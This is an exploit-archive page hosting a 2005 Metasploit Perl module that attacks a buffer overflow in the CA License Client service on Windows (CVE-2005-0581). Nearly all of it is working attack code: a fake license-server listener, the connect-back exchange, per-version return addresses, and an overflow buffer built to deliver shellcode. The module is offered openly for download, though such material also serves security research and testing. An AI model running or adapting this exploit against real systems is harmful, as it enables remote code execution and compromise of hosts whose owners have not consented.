exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

calicclnt_getconfig.pm

calicclnt_getconfig.pm
Posted Mar 5, 2005
Authored by Thor Doomen

This module exploits a vulnerability in the CA License Client service. This exploit will only work if your IP address will resolve to the target system. This can be accomplished on a local network by running the nmbd service that comes with Samba. If you are running this exploit from Windows and do not filter udp port 137, this should not be a problem (if the target is on the same network segment). Due to the bugginess of the software, you are only allowed one connection to the agent port before it starts ignoring you. If it was not for this issue, it would be possible to repeatedly exploit this bug.

tags | exploit, local, udp
systems | windows
advisories | CVE-2005-0581
SHA-256 | 8f742b1d2f8f4be4c918b2a485a7be87c69a6f8c540baac8a0c7fa32f7b196d6

calicclnt_getconfig.pm

Change Mirror Download

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::calicclnt_getconfig;
use base "Msf::Exploit";
use strict;
use Pex::Text;

use IO::Socket;
use IO::Select;

my $advanced = { };

my $info =
{
'Name' => 'CA License Client GETCONFIG Overflow',
'Version' => '$Revision: 1.7 $',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' }, # avoid the ugly pop-up
'UserOpts' => {
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 10203],
},

'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x20",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
'Keys' => ['+ws2ord'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits an vulnerability in the CA License Client
service. This exploit will only work if your IP address will
resolve to the target system. This can be accomplished on a local
network by running the 'nmbd' service that comes with Samba. If
you are running this exploit from Windows and do not filter udp
port 137, this should not be a problem (if the target is on the same
network segment). Due to the bugginess of the software, you are
only allowed one connection to the agent port before it starts
ignoring you. If it wasn't for this issue, it would be possible to
repeatedly exploit this bug.

}),

'Refs' =>
[
['BID', '12705'],
['CVE', '005-0581'],
['URL', 'http://www.idefense.com/application/poi/display?id=213&type=vulnerabilities'],
],

'Targets' => [

# As much as I would like to return back to the DLL or EXE,
# all of those modules have a leading NULL in the
# loaded @ address :(

['Automatic', 0],
['Windows 2000 English', 0x750217ae, 0x7ffde0cc], # ws2help.dll esi + peb
['Windows XP English SP0-1', 0x71aa16e5, 0x7ffde0cc], # ws2help.dll esi + peb
['Windows XP English SP2', 0x71aa1b22, 0x71aa5001], # ws2help.dll esi + .data
['Windows 2003 English SP0', 0x71bf175f, 0x7ffde0cc], # ws2help.dll esi + peb
],
'Keys' => ['calicense'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

my $server = IO::Socket::INET->new
(
'LocalPort' => 10202,
'Proto' => 'tcp',
'ReuseAddr' => 1,
'Listen' => 5,
'Blocking' => 0,
);

if (! $server) {
$self->PrintLine("[*] Could not start the fake CA License Server: $!");
return;
}
my $sel = IO::Select->new($server);

# 1: Connect to the agent and send a request
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError) {
$self->PrintLine("[*] Could not connect to the client agent");
$server->shutdown(2);
$server->close;
return;
}

$s->Send("A0 GETSERVER<EOM>\n");
$self->PrintLine("[*] Waiting for the license agent to connect back...");

my $r = $s->Recv(-1, 3);

# 2: Wait for a connection from the agent back to us
my @ready = $sel->can_read(8);
if (! scalar(@ready)) {
$self->PrintLine("[*] No connection was received from the agent >:(");
$s->Close;
$server->shutdown(2);
$server->close;
return;
}

# 3: Accept the connection and determine target type if needed
my $agent_soc = $ready[0]->accept();
my $agent = Msf::Socket::Tcp->new_from_socket($agent_soc);
$self->PrintLine("[*] Accepted connection from agent ".$agent->PeerAddr);

if ($target_idx == 0) {

$agent->Send("A0 GETCONFIG SELF 0<EOM>");
my $data = $agent->Recv(-1, 2);

if ($data =~ m/OS\<([^\>]+)/) {
my $os = $1;
$os =~ s/_NT//g;
$os =~ s/5\.1/XP/;
$os =~ s/5\.2/2003/;
$os =~ s/5\.0/2000/;
$os =~ s/4\.0/NT 4.0/;

my @targs;
for (1 .. (scalar(@{$self->Targets})-1)) {
if (index($self->Targets->[$_]->[0], $os) != -1) {
push @targs, $_;
}
}

if (scalar(@targs) > 1) {
$self->PrintLine("[*] Multiple possible targets:");
foreach (@targs) {
$self->PrintLine("[*] $_\t".$self->Targets->[$_]->[0]);
}
$self->PrintLine("[*] Picking the closest target and hoping...");
return;
}

if (scalar(@targs)) {
$target = $self->Targets->[$targs[0]];
}

if (! scalar(@targs)) {
$self->PrintLine("[*] No matching target for $os");
return;
}

} else {
$self->PrintLine("[*] Could not determine the remote OS automatically");
return;
}
}

$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

my $boom = Pex::Text::EnglishText(900);

# 144 -> original return address
# 148 -> avoid exception by patching with writable address
# 928 -> seh handler (not useful under XP SP2)

substr($boom, 144, 4, pack('V', $target->[1])); # jmp esi
substr($boom, 148, 4, pack('V', $target->[2])); # writable address
substr($boom, 272, length($shellcode), $shellcode);

my $req = "A0 GETCONFIG SELF $boom<EOM>";

$self->PrintLine("[*] Sending " .length($req) . " bytes to remote host.");
$agent->Send($req);

$server->shutdown(2);
$agent->Close;
$s->Close;

return;
}

1;
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close